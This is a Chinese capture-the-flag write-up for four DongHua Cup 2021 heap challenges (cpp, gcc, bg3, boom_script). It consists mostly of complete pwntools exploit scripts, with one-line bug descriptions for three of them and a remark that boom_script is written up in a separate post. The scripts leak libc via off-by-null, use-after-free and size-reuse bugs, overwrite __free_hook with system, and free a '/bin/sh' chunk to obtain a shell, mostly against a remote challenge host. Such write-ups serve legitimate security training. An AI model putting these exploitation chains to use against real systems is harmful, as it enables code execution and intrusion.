eeeeeeeeeeeeeeeea

愿我们永远热泪盈眶!


东华杯2021

东华杯

一:cpp

2.31的off-by-null

from pwn import *
#p = process("./pwn")
# Connects to the challenge instance used in the writeup; the commented
# process() line above is the local-run variant.
p = remote("47.104.143.202",43359)
context.log_level = "debug"  # echo every send/recv so a desynchronised step is visible
context.arch = "amd64"
# Every libc.sym[...] lookup below is resolved against this file, so the
# offsets are tied to the exact libc-2.31 build shipped with the challenge.
libc = ELF("./libc-2.31.so")

def add(index, size):
    """Drive menu option 1: send the choice, then the slot index, then the size."""
    for answer in ("1", str(index), str(size)):
        p.sendlineafter(">>", answer)

def edit(index, content):
    """Drive menu option 2: send the choice, the slot index, then the raw content."""
    for answer in ("2", str(index), content):
        p.sendlineafter(">>", answer)

def show(index):
    """Drive menu option 3: send the choice, then the slot index to print."""
    for answer in ("3", str(index)):
        p.sendlineafter(">>", answer)

def free(index):
    """Drive menu option 4: send the choice, then the slot index to release."""
    for answer in ("4", str(index)):
        p.sendlineafter(">>", answer)



# Seven 0x80-byte allocations in slots 0-6, followed by four smaller ones.
for i in range(7):
    add(i,0x80) #0-6

add(7,0x18)
add(8,0x60)
add(9,0x10)
add(10,0x30)
# 0x10 filler + an 8-byte zero + one 0x91 byte = 0x19 bytes written into a
# 0x18-byte request, i.e. one byte past what slot 7 asked for.
edit(7,"a"*0x10+p64(0)+"\x91")
# Release slots 0-6, then slot 8, then re-allocate slots 0-6 at the same size.
for i in range(7):
    free(i)

free(8)
for i in range(7):
    add(i,0x80)

add(8,0x60)
show(9)
# Read until the first 0x7f byte; the 6 bytes before it are decoded as a
# little-endian pointer and rebased with a fixed distance from __malloc_hook.
# NOTE(review): ljust(8,"\x00") on recv() output only works where str and
# bytes are the same type (Python 2 pwntools) — confirm before running on 3.x.
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) - libc.sym["__malloc_hook"] - 0x10 - 96
success("libc_base:"+hex(libc_base))
add(11,0x10)
add(12,0x18)
add(13,0x18)
add(14,0x10)
free(12)
free(14)
# 3 zero qwords + 0x21 + the __free_hook address = 0x28 bytes written through
# slot 13, which was requested with 0x18 bytes.
edit(13,p64(0)*3+p64(0x21)+p64(libc_base+libc.sym["__free_hook"]))
add(12,0x18)
add(15,0x18)

edit(15,p64(libc_base+libc.sym["system"]))
edit(12,"/bin/sh\x00")
free(12)
p.interactive()

二:gcc

2.31的UAF

from pwn import *
#p = process("./pwn")
# Connects to the challenge instance used in the writeup; the commented
# process() line above is the local-run variant.
p = remote("47.104.143.202",15348)
context.log_level = "debug"  # echo every send/recv so a desynchronised step is visible
context.arch = "amd64"
# Every libc.sym[...] lookup below is resolved against this file, so the
# offsets are tied to the exact libc-2.31 build shipped with the challenge.
libc = ELF("./libc-2.31.so")

def g():
    """Attach gdb to the live target and block on stdin until Enter is pressed."""
    gdb.attach(p)
    _ = input()


def menu(choice):
    """Answer the ">>" prompt with the menu choice rendered as a string."""
    choice_text = str(choice)
    p.sendlineafter(">>", choice_text)

def add(index, size):
    """Menu option 1: allocate `size` bytes into slot `index`."""
    menu(1)
    for answer in (str(index), str(size)):
        p.sendlineafter(">>", answer)

def edit(index, content):
    """Menu option 2: write `content` into slot `index`."""
    menu(2)
    for answer in (str(index), content):
        p.sendlineafter(">>", answer)

def show(index):
    """Menu option 3: print slot `index`."""
    menu(3)
    index_text = str(index)
    p.sendlineafter(">>", index_text)

def free(index):
    """Menu option 4: release slot `index`."""
    menu(4)
    index_text = str(index)
    p.sendlineafter(">>", index_text)

add(0,0x60)
add(1,0x60)
free(0)
free(1)
# Slot 1 is shown and edited after it was freed — the use-after-free the
# section title refers to.
show(1)
p.recv()  # discard the first read; the value of interest is in the next 6 bytes
# 0x12ec0 is a fixed distance for this binary's heap layout.
# NOTE(review): ljust(8,"\x00") on recv() output only works where str and
# bytes are the same type (Python 2 pwntools) — confirm before running on 3.x.
heap_base = u64(p.recv(6).ljust(8,"\x00")) - 0x12ec0
success("heap_base:"+hex(heap_base))
edit(1,p64(heap_base+0x10))

add(2,0x67) #2
add(3,0x67)

# 0x4f bytes of 0x07 into slot 3, then release and print it.
edit(3,"\x07"*0x4f)
free(3)
show(3)
# Read until the first 0x7f byte; the 6 bytes before it are decoded as a
# little-endian pointer and rebased with a fixed distance from __malloc_hook.
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym["__malloc_hook"] - 96 - 0x10
success("libc_base:"+hex(libc_base))

# Zero the same 0x4f bytes again, release slots 1 and 0, and write through
# slot 0 after it has been freed.
edit(3,"\x00"*0x4f)
free(1)
free(0)
edit(0,p64(libc_base+libc.sym["__free_hook"]))
add(4,0x67)
add(5,0x67) #free_hook
sleep(1)  # presumably lets the target drain its input before the next send — confirm
edit(5,p64(libc_base+libc.sym["system"]))

edit(1,"/bin/sh\x00")

free(1)

p.interactive()

三:bg3

free之后存放size的地方没有清空,再次add同一个堆就会造成size叠加

from pwn import *
#p = process("./pwn")
# Connects to the challenge instance used in the writeup; the commented
# process() line above is the local-run variant.
p = remote("47.104.143.202",25997)
context.log_level = "debug"  # echo every send/recv so a desynchronised step is visible
context.arch = "amd64"
# Every libc.sym[...] lookup below is resolved against this file, so the
# offsets are tied to the exact libc-2.31 build shipped with the challenge.
libc = ELF("./libc-2.31.so")


def menu(idx):
    """Answer the 'Select:' prompt with the menu choice rendered as a string."""
    choice_text = str(idx)
    p.sendlineafter('Select:', choice_text)

def add(idx, size):
    """Menu option 1: allocate a payload of `size` bytes into slot `idx`."""
    menu(1)
    for prompt, answer in (("Index:", str(idx)), ("PayloadLength:", str(size))):
        p.sendlineafter(prompt, answer)

def edit(idx, content):
    """Menu option 2: write `content` into slot `idx` at the 'BugInfo:' prompt."""
    menu(2)
    for prompt, answer in (('Index:', str(idx)), ('BugInfo:', content)):
        p.sendlineafter(prompt, answer)

def free(idx):
    """Menu option 4: release slot `idx`."""
    menu(4)
    index_text = str(idx)
    p.sendlineafter('Index:', index_text)

def show(idx):
    """Menu option 3: print slot `idx`."""
    menu(3)
    index_text = str(idx)
    p.sendlineafter('Index:', index_text)


def g():
    """Attach gdb to the live target and block on stdin until Enter is pressed."""
    gdb.attach(p)
    _ = input()


add(0,0x665)
add(1,0x68)
add(2,0x68)

# Per the writeup: the stored size is not cleared on free, so re-adding slot 0
# accumulates the old size instead of replacing it.
free(0)
add(0,0x68) #leak

show(0)
# Read until the first 0x7f byte; the 6 bytes before it are decoded as a
# little-endian pointer and rebased with a fixed distance (1248 = 0x4e0) from
# __malloc_hook.
# NOTE(review): ljust(8,'\x00') on recv() output only works where str and
# bytes are the same type (Python 2 pwntools) — confirm before running on 3.x.
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x10-libc.sym['__malloc_hook']-1248
free_hook = libc_base +libc.sym['__free_hook']
system = libc_base+libc.sym['system']
success("libc_base:"+hex(libc_base))

add(3,0x68)
add(4,0x68)
free(4)
free(3)
# 0x68 zero bytes + 0x71 + the __free_hook address = 0x78 bytes written
# through slot 0, which was last requested with 0x68 bytes.
payload = '\x00'*0x68+p64(0x71)+p64(free_hook)
edit(0,payload)
add(5,0x68)
add(6,0x68)
edit(5,'/bin/sh\x00')
edit(6,p64(system))
free(5)

p.interactive()

四:boom_script

在另一篇博客单独写了,这里只放上exp,感谢t0rm3nt师傅帮助理解

from pwn import *
context.log_level = 'debug'  # echo every send/recv so a desynchronised step is visible
context.arch = 'amd64'
# The libc.sym[...] lookup below is resolved against this file, so the
# hard-coded 0x1ebbe0 offset is tied to this exact libc build.
libc = ELF("./libc.so.6")
#p = remote("47.104.143.202",41299)
# Runs the binary locally; the commented remote() line above is the
# challenge-instance variant.
p = process("./boom_script")
bss=0x76100  # not referenced anywhere else in this script
p.sendlineafter("$",'1')  # pick option 1 at the target's "$" prompt

code = '''
a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
b = a;
a = "aaaaaa";
prints(b);
c=0;
array arr[20];
arr[0] = 1;
b="bbbbbb"
a1="cccccccccccccccccccccccccccccccccccccccccccccccccccccccc";

tc1 = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee";
sss = "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee";
aaa = "/bin/sh";
tc1 = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
sss = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
prints("eeee");
inputn(c);
arr[0] = c;
arr[1] = c;



'''

# The declared length is one more than the script text — presumably to cover
# the newline that sendlineafter appends; confirm against the target's reader.
p.sendlineafter("length:",str(len(code)+1))
p.sendlineafter("code:",code)

# Read until the first 0x7f byte; the 6 bytes before it are decoded as a
# little-endian pointer and 0x1ebbe0 is a fixed distance for the bundled libc.
# NOTE(review): ljust(8,"\x00") on recv() output only works where str and
# bytes are the same type (Python 2 pwntools) — confirm before running on 3.x.
libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x1ebbe0
success("libc_base:"+hex(libc_base))

# The submitted script calls prints("eeee") and then inputn(c); this answers
# that input with the __free_hook address as a decimal string.
p.sendlineafter("eeee",str(libc_base+libc.sym["__free_hook"]))

p.interactive()